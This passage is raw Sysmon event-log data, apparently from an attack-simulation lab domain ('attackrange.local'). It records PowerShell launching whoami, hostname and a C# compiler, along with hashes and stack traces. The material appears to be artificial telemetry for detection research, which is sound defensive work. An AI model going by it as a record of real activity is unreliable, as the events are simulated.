/NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RES8B80.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\CSC6CA485C5EABA4B968FA4F0424C3D7C6C.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{5ABCFE62-E654-6040-DC4D-00000000AD01}5188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.cmdline" 10341000x80000000000000002200378Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.380{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E654-6040-DC4D-00000000AD01}5188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200377Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.380{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200376Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.380{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200375Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.380{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200374Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.380{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200373Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.380{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-E654-6040-DC4D-00000000AD01}5188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200372Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.380{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E654-6040-DC4D-00000000AD01}5188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffd060(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffd060(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c618357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64) 154100x80000000000000002200371Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.365{5ABCFE62-E654-6040-DC4D-00000000AD01}5188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002200370Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.349{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.cmdline2021-03-04 13:53:24.349 11241100x80000000000000002200369Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.localDLL2021-03-04 13:53:24.349{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pvotsqhj\pvotsqhj.dll2021-03-04 13:53:24.349 23542300x80000000000000002200368Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.333{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=08DF117478EAA9026D0A9EEE20FAD3AD,SHA256=C09E0F8AC3FEE7C06488644D2B1578A9D46E6D4170E0653A25486EADE154BFB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200367Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.224{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBCA7E12E6B60FD7C1E4917D422E4890,SHA256=2EEF8EAC24AD0A5BF433B3A697585069F33D296AAEFC2841B06CA1028134538D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200366Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.208{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E654-6040-DB4D-00000000AD01}2200C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200365Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.208{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200364Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.208{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200363Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.208{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200362Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.208{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200361Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.208{5ABCFE62-99F1-603E-7907-00000000AD01}30806064C:\Windows\system32\csrss.exe{5ABCFE62-E654-6040-DB4D-00000000AD01}2200C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200360Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.208{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E654-6040-DB4D-00000000AD01}2200C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d1532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64) 154100x80000000000000002200359Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.215{5ABCFE62-E654-6040-DB4D-00000000AD01}2200C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000002200358Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.192{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E654-6040-DA4D-00000000AD01}2716C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200357Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.192{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200356Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.192{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200355Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.192{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200354Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:24.192{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL